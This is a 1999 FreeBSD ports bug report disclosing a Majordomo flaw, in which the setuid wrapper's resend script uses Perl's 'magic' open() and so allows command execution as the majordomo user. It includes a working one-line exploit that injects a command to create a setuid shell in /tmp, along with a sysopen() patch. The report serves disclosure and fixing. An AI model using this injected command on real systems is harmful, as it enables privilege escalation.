From owner-freebsd-ports Wed Dec 29 11:40: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 700F715861 for ; Wed, 29 Dec 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA75546; Wed, 29 Dec 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 1DA1D15122 for ; Wed, 29 Dec 1999 11:38:58 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 78DC41BBD; Wed, 29 Dec 1999 11:43:19 -0500 (EST) Message-Id: <19991229164319.78DC41BBD@anarcat.dyndns.org> Date: Wed, 29 Dec 1999 11:43:19 -0500 (EST) From: AnarCat@anarcat.dyndns.org Reply-To: AnarCat To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15768: Majordomo resend prog allow exec of any prog as majordomo user Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15768 >Category: ports >Synopsis: Majordomo resend prog allow exec of any prog as majordomo user >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 29 11:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: AnarCat >Release: FreeBSD 3.4-STABLE i386 >Organization: >Environment: Latest port collection (dated of 1999.12.28). Running 3.4-Stable. Should affect any system with latest ports collection. >Description: [From BugTraq, Brock Tellier, btellier@USA.NET] Majordomo features a wrapper that is suid root and then setuid(majordomo). It is used to exec various programs in the $PREFIX/majordomo dir. One of them is the resend Perl script which does a open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped"); So this can be used to exec another program with the wrapper privileges. >How-To-Repeat: Our exploit is simple: bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec' resend: must specify '-l list' at /usr/local/majordomo/resend line 77. bash-2.02$ ls -la /tmp/xnec -r-sr-sr-x 1 owner daemon 361688 Dec 29 06:26 /tmp/xnec In our case "owner" is majordomo. >Fix: From BugTraq again, ("Todd C. Miller" ): For those using perl 5.x, you can use sysopen() instead of the "magic" perl open() to fix this. - todd --- resend Thu Aug 19 10:12:03 1999 +++ resend+ Tue Dec 28 23:55:39 1999 @@ -58,7 +58,7 @@ if ($ARGV[0] =~ /^\@/) { $fn = shift(@ARGV); $fn =~ s/^@//; - open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped"); + sysopen(AV, $fn, O_RDONLY) || die("sysopen(AV, \"$fn\", O_RDONLY): $!\nStopped"); undef($/); # set input field separator $av = ; # read whole file into string close(AV); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message